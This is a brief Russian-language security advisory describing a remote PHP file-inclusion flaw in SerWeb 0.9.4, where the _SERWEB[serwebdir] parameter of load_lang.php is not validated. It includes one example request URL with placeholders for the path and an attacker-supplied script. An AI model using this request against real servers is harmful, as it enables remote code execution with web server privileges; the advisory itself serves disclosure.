Программа: SerWeb 0.9.4

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «_SERWEB[serwebdir]» сценарием load_lang.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://site.com/[path]/load_lang.php?_SERWEB[serwebdir]=[Evil_Script]



Оставить мнение